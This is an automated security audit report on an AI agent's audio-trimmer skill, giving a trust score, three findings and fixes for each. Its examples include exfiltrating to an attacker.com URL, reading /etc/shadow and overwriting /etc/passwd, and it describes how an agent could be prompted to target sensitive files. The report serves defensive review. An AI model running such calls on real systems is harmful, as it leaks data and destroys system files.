Security Audit
dkyazzentwatwa/chatgpt-skills:audio-trimmer
github.com/dkyazzentwatwa/chatgpt-skillsTrust Assessment
dkyazzentwatwa/chatgpt-skills:audio-trimmer received a trust score of 71/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 3 findings: 0 critical, 1 high, 2 medium, and 0 low severity. Key findings include Unpinned Python dependency version, Arbitrary URL access via input/output file paths, Arbitrary file read/write/overwrite capability.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 24, 2026 (commit d4bad335). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings3
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Arbitrary URL access via input/output file paths The `AudioTrimmer` skill allows users to specify input and output file paths. Since `pydub` (which uses `ffmpeg` internally) supports reading from and writing to URLs, an attacker could provide a URL instead of a local file path. This could lead to:
- **Data Exfiltration:** Writing processed audio to an attacker-controlled server (e.g., `trimmer.save("http://attacker.com/exfil.mp3")`).
- **Data Ingress:** Reading audio from an arbitrary URL, potentially downloading malicious content or large files, leading to resource exhaustion or other `ffmpeg` vulnerabilities (e.g., `AudioTrimmer("http://attacker.com/malicious.mp3")`).
The skill does not validate if the provided paths are local file paths or URLs, allowing `ffmpeg` to perform network operations based on user input. Implement strict validation for all file path arguments (`filepath`, `overlay_filepath`, elements of `files`, `output_path`). Ensure they are local file paths (e.g., by checking for URL schemes like `http://`, `https://`, `ftp://`) and do not allow network access unless explicitly intended and controlled. | Static | scripts/audio_trimmer.py:35 | |
| MEDIUM | Unpinned Python dependency version Requirement 'pydub>=0.25.0' is not pinned to an exact version. Pin Python dependencies with '==<exact version>'. | Dependencies | audio-trimmer/scripts/requirements.txt:1 | |
| MEDIUM | Arbitrary file read/write/overwrite capability The skill's core functionality involves reading from and writing to arbitrary file paths specified by the user. While necessary for its purpose, it does not restrict these operations to a specific directory or enforce any sandboxing. An agent using this skill could be instructed to:
- Read arbitrary files on the system (e.g., `AudioTrimmer("/etc/shadow")`). Although `pydub` would likely fail to parse non-audio files, the attempt to read could still be a privacy concern or lead to resource exhaustion.
- Overwrite arbitrary files on the system with audio data (e.g., `trimmer.save("/etc/passwd")`). This could lead to data corruption or denial of service for critical system files.
This capability, when exposed to an LLM agent, presents a risk if the agent is not properly sandboxed or if it can be prompted to target sensitive files. Implement path validation to ensure input and output files are within an allowed, sandboxed directory (e.g., a temporary directory or a user-specific data directory). Additionally, consider implementing checks to prevent overwriting critical system files or reading from sensitive system locations. | Static | scripts/audio_trimmer.py:25 |
Scan History
Embed Code
[](https://skillshield.io/report/47b22cbbd79ea03b)
Powered by SkillShield